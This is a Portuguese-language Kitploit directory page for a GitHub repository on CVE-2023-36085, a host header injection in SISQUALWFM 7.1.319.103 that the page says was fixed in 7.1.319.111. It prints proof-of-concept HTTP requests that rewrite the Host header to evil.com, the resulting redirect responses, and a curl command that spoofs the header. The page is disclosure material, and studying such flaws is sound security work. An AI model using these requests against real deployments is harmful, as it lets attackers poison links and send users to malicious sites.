Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — Este repositório contém informações relacionadas à CVE-2023-36085, uma vulnerabilidade de injeção de cabeçalho de host descoberta no SISQUALWFM versão 7.1.319.103, que permite que um atacante manipule links de páginas da web ou redirecione usuários para um site malicioso. Esta vulnerabilidade foi atribuída à CVE-2023-36085 e foi corrigida na versão 7.1.319.111 e superior. | Kitploit
Ferramentas/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Este repositório contém informações relacionadas à CVE-2023-36085, uma vulnerabilidade de injeção de cabeçalho de host descoberta no SISQUALWFM versão 7.1.319.103, que permite que um atacante manipule links de páginas da web ou redirecione usuários para um site malicioso. Esta vulnerabilidade foi atribuída à CVE-2023-36085 e foi corrigida na versão 7.1.319.111 e superior.

Compartilhar

Vulnerabilidade de Injeção de Cabeçalho de Host no SISQUALWFM CVE-2023-36085

Este repositório contém informações relacionadas a uma vulnerabilidade de injeção de cabeçalho de host descoberta no SISQUALWFM versão 7.1.319.103, que permite a um atacante manipular links de páginas da web ou redirecionar usuários para um site malicioso. Esta vulnerabilidade recebeu o CVE-2023-36085 e foi corrigida na versão 7.1.319.111 e superiores.

Detalhes da Vulnerabilidade

  • Título do Exploit: SISQUALWFM 7.1.319.103 Host Header Injection
  • Data da Descoberta: 17/03/2023
  • Data do Relato: 17/03/2023
  • Data da Resolução: 13/10/2023
  • Autor do Exploit: Omer Shaik (unknown_exploit)
  • Página do Fornecedor: SISQUALWFM
  • Versão: 7.1.319.103
  • Testado em: SISQUAL WFM 7.1.319.103
  • Versão Afetada: SISQUALWFM 7.1.319.103
  • Versão Corrigida: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • Pontuação CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Categoria: Aplicações Web

Prova de Conceito

Fornecemos um cenário de prova de conceito que demonstra a vulnerabilidade de injeção de cabeçalho de host, visando especificamente o endpoint . Esta vulnerabilidade permite que um atacante manipule links de páginas da web ou redirecione usuários para outro site ao adulterar o cabeçalho de host.

/sisqualIdentityServer/core

Solicitação Original

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

Resposta Original

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

Solicitação Interceptada (Modificada para Redirecionar para evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

Resposta

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Execução do Exploit

Método de Ataque

Para explorar esta vulnerabilidade, um atacante pode utilizar o seguinte comando curl para modificar o cabeçalho de host:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

Aviso Legal

Este repositório tem caráter exclusivamente informativo e não deve ser utilizado para atividades maliciosas. A vulnerabilidade foi divulgada de forma responsável ao fornecedor, e o problema já foi resolvido. É fundamental seguir as diretrizes de hacking ético e respeitar as práticas de divulgação responsável ao identificar e relatar vulnerabilidades.

Baixar ferramenta